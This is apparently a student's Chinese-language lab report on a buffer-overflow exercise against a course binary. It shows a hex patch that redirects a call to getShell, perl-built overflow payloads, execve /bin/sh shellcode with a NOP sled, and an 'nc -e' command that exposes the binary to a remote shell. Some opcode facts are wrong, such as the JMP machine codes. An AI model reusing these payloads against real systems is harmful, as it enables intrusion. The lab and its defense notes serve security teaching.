首页 > 其他分享 >20201315《网络对抗技术》Exp1

20201315《网络对抗技术》Exp1

时间:2023-03-15 15:58:55浏览次数:49  
标签:kali Exp1 地址 指令 20201315 跳转 输入 shellcode 对抗

目录

1 逆向及Bof基础实践说明

1.1 NOP, JNE, JE, JMP, CMP汇编指令的机器码

  • NOP:机器码为0x90。NOP指令即“空指令”,执行到NOP指令时,CPU什么也不做,完毕之后继续执行NOP后面的一条指令。

  • JNE:机器码为0x75。JNE是条件转移指令,如果不相等则跳转。

  • JE:机器码为0x74。JE是条件转移指令,如果相等则跳转。

  • JMP

    :无条件跳转指令。JMP主要分为3种:

    • 短跳转:机器码为0xE8。只能跳转到256字节的范围内
    • 近跳转:机器码为0xE9。可跳至同一个段范围内的地址
    • 远跳转:机器码为0xEA。可跳至任意地址,使用48位/32位全指针
  • CMP:比较指令,功能相当于减法指令,对操作数之间运算比较,不保存结果。CMP指令也有多种形式,分别代表不同的功能,机器码分别为0x38、0x39、0x3A、0x3B、0x3C、0x3D。

2 直接修改程序机器指令,改变程序执行流程

  • 知识要求:Call指令,EIP寄存器,指令跳转的偏移计算,补码,反汇编指令objdump,十六进制编辑工具
  • 学习目标:理解可执行文件与机器指令
  • 进阶:掌握ELF文件格式,掌握动态技术

下载目标文件pwn1,将文件名改为20201315exp1,将其放入共享文件夹share,然后试运行,并用指令objdump -d 20201315exp1 | more反汇编

一直按回车就会逐行显示更多信息,直到找到可查看到main的内容

此处我们想让它调用getShell,因此要将此处“d7ffffff”修改为 "getShell-80484ba"对应的补码就行

0804847d-80484ba=ffffffc3

于是我们修改可执行文件,将其中的call指令的目标地址由d7ffffff变为c3ffffff:

  1. vi进入20201315exp1,在乱码界面按Esc键,然后输入:%!xxd将显示模式切换为16进制模式

  2. 输入/e8 d7找到e8d7,修改d7为c3(先按i进入编辑模式再改,改完按Esc键退出)

  3. 输入:%!xxd -r转换16进制为原格式

  4. 输入:wq退出

再次反汇编发现已经完成修改

运行发现已经跳转到getshell函数,得到了shell提示符。

3 通过构造输入参数,造成BOF攻击,改变程序执行流

3.1 反汇编,了解程序的基本功能

对pwn1反汇编。该可执行文件正常运行是调用函数foo。foo函数有Buffer overflow漏洞:foo读入字符串,但系统只预留了(28)字节的缓冲区,超出部分会造成溢出,我们的目标是覆盖返回地址

如图输入1111111122222222333333334444444455555555时产生溢出Segmentation fault

3.2 确认输入字符串哪几个字符会覆盖到返回地址、用什么值来覆盖返回地址

3.2.1分析覆盖返回地址的字符

输入为1111111122222222333333334444444455555555时观察寄存器数值发现eip为0x35353535,对应ASCLL表是5555,可以看出本来应返回到foo函数的返回地址已被"5555"覆盖。

通过将55555555换成12345678,再观察eip值找出谁被覆盖,通过查表可知为1234,将1234改为要跳转的地址0804847d所以要输入的是11111111222222223333333344444444\x7d\x84\x04\x08

3.3 构造输入字符串

我们没法通过键盘输入\x7d\x84\x04\x08这样的16进制值,所以先生成包括这样字符串的一个文件。\x0a表示回车,如果没有的话,在程序运行时就需要手工按一下回车键。

Perl是一门解释型语言,不需要预编译,可以在命令行上直接使用。
使用输出重定向>将perl生成的字符串存储到文件input中。可以使用16进制xxd查看指令查看input文件的内容是否如预期。

3.4攻击成功

将input的输入,通过管道符“|”,作为pwn1的输入,发现成功跳转入getshell

4. 注入Shellcode并执行

4.1 准备一段Shellcode

shellcode就是一段机器指令(code)

  • 通常这段机器指令的目的是为获取一个交互式的shell(像linux的shell或类似windows下的cmd.exe)
  • 所以这段机器指令被称为shellcode。
  • 在实际的应用中,凡是用来注入的机器指令段都通称为shellcode,像添加一个用户、运行一条指令。

本实验所使用的shellcode为

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\

4.2 准备工作

输入sudo apt-get install execstack ,安装execstack命令

按教程进行操作:

  1. 运行execstack -s 20201315exp1设置堆栈可执行
  2. 运行execstack -q 20201315exp1查询文件的堆栈是否可执行
  3. 发现randomize_va_space值为2,说明地址随机化是开启的。

关闭地址随机化并查看是否成功关闭

4.3 构造要注入的payload

  • 我们采用retaddr+nop+shellcode构造攻击buf

    • nop一为是了填充,二是作为“着陆区/滑行区”。
    • 我们猜的返回地址只要落在任何一个nop上,自然会滑到我们的shellcode。

打开两个终端,都进入root模式

终端1使用命令

perl -e 'print "A" x 32;print  "\x04\x03\x02\x01\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' >input_shellcode

注入攻击buf

运行之后先不输入回车,在后面的调试过程中需要继续运行的时候再回车

打开终端2,找到20201315exp1的进程号是9967

启动gdb调试这个进程

通过设置断点,来查看注入buf的内存地址

使用break *0x080484ae设置断点,并输入c继续运行。在20201315exp1进程正在运行的终端敲回车,使其继续执行,这就是前面为什么不能以\x0a来结束 input_shellcode的原因。

再返回调试终端,使用info r esp查找地址。使用x/16x 0xffffd4fc查看其存放内容,看到了0x01020304,就是返回地址的位置。根据我们构造的input_shellcode可知,shellcode就在其后,所以地址是 0xffffd500

将0xffffd500放进shellcode

注入后攻击成功

4.4 结合nc模拟远程攻击

我用的是本机上的两个虚拟机,靶机为kali,攻击机为ubuntu。二者互ping可通

靶机ip:192.168.136.129

攻击机ip:192.168.132.1

靶机输入以下命令

nc -lvnp 1315 -e ./20201315exp1

攻击机输入

perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input
(cat input; cat) | nc 192.168.137.142 1324

然后就能获取靶机的shell

靶机端此时显示如下

5 Bof攻击防御技术

5.1. 从防止注入的角度

在编译时,编译器在每次函数调用前后都加入一定的代码,用来设置和检测堆栈上设置的特定数字,以确认是否有bof攻击发生

5.2. 注入了也不让运行

结合CPU的页面管理机制,通过DEP/NX用来将堆栈内存区设置为不可执行。这样即使是注入的shellcode到堆栈上,也执行不了

5.3. 增加shellcode的构造难度

开启地址随机化:shellcode中需要猜测返回地址的位置,需要猜测shellcode注入后的内存位置。这些都极度依赖一个事实:应用的代码段、堆栈段每次都被OS放置到固定的内存地址。ALSR,地址随机化就是让OS每次都用不同的地址加载应用。这样通过预先反汇编或调试得到的那些地址就都不正确了

/proc/sys/kernel/randomize_va_space用于控制Linux下 内存地址随机化机制,其取值有以下三种情况

0 - 表示关闭进程地址空间随机化。
1 - 表示将mmap的基址,stack和vdso页面随机化。
2 - 表示在1的基础上增加栈(heap)的随机化。

当前/proc/sys/kernel/randomize_va_space值为0,我们将其改回2

5.4 从管理的角度

加强编码质量。注意边界检测。使用最新的安全的库函数。

6 实践总结

6.1遇到的问题

execstack安装失败

解决方法:参考链接

Kali Linux E:Unable to locate package 完美解决

第一步:打开sources.list文件

sudo vim /etc/apt/sources.list

第二步:在文件中添加以下内容

deb http://http.kali.org/kali kali-rolling main contrib non-free
deb http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security sana/updates main contrib non-free
deb http://old.kali.org/kali moto main non-free contrib

然后保存退出,再进行更新

sudo apt-get update

最后成功下载

6.2实验体会

这次实验是网络对抗的第一次实验,因为有之前课程和上学期课程设计的基础,关于缓冲区溢出相关知识我是较为熟悉的,这次实验我做起来还是比较轻松的,这让我感受到了提前学习所带来的好处,在接下来的实验中我也会提前学习相关知识,这样我的实验过程才会更加顺利。实验过程中的主要困难和问题还是对kali的不熟悉(之前都是使用ubuntu)造成的。如果没有进一步熟悉kali,我觉得接下来的实验这类问题还会反复出现,因此我也会对此多下些功夫。

标签:kali,Exp1,地址,指令,20201315,跳转,输入,shellcode,对抗
From: https://www.cnblogs.com/moonyecho/p/17218728.html

相关文章

  • 对抗遗忘
    我英语很差很差,四级没过,对需要记忆的东西我天生有种畏惧感,不想记也不爱记我理解能力倒是很强,需要理解的科目我都很强,比如在高中,我物理得分基本都是90%以上,因为物理一看就......
  • 【Android 抓包对抗】客户端证书和域名校验绕过
    1.按照之前的方式(https://www.cnblogs.com/gradyblog/p/17197707.html)进行抓包发现证书校验失败SSLhandshakewithclientfailed:Anunknownissueoccurredprocessi......
  • 红蓝对抗 (red-teaming)
    论文地址:https://arxiv.org/abs/2209.07858论文题目:RedTeamingLanguageModelstoReduceHarms:Methods,ScalingBehaviors,andLessonsLearned减少危害的红队......
  • 一文看尽深度学习中的生成对抗网络 | GANs架构发展的8年
    前言 生成对抗网络(GenerativeAdversarialNetworks,GANs)在过去几年中被广泛地研究,其在图像生成、图像转换和超分辨率等领域取得了显著的进步。到目前为止,已经提出了......
  • 卷积生成对抗网络---生成手写数字
    深度卷积生成对抗网络(DCGAN)----生成MNIST手写图片1、基本原理生成对抗网络(GAN)由2个重要的部分构成:生成器(Generator):通过机器生成数据(大部分情况下是图像),目的是“骗过”......
  • 索尼下场造车,正面对抗苹果Apple Car
    索尼与本田将打造“宅男狂喜”版智能网联汽车,卖点是丰富的游戏、影音娱乐功能。1月4日,在拉斯维加斯举办的国际消费类电子产品展览会(下称CES)上,索尼和本田的合资企业......
  • 生成对抗网络GANs的用途
    简介如果说目前深度学习最火,应用最多的领域,莫过于GAN--GenerativeAdversarialNetwork,翻译过来就是生成对抗网络,单单从名字上看,你会觉得它就是一个生成模型,看起来就是用于......
  • 【CV秋季划】生成对抗网络GAN有哪些研究和应用,如何循序渐进地学习好?
    GAN的研究在这几年发展可以说是非常迅猛,已经被用于各个研究方向,其应用涉及图像与视频生成,数据仿真与增强,各种各样的图像风格化任务,人脸与人体图像编辑,图像质量提升。那我们......
  • 【机器学习】李宏毅——Adversarial Attack(对抗攻击)
    研究这个方向的动机,是因为在将神经网络模型应用于实际场景时,它仅仅拥有较高的正确率是不够的,例如在异常检测中、垃圾邮件分类等等场景,那些负类样本也会想尽办法来“欺骗”......
  • WebRTC 的音频弱网对抗之 NACK
    基础知识音频的NACK机制在WebRTC中默认是关闭的.rtcpfeedbacknack开启就可以了WebRTC的音频数据传输中,尽管对低延时有着很高的要求,但也实现了NACK,以用于一些音......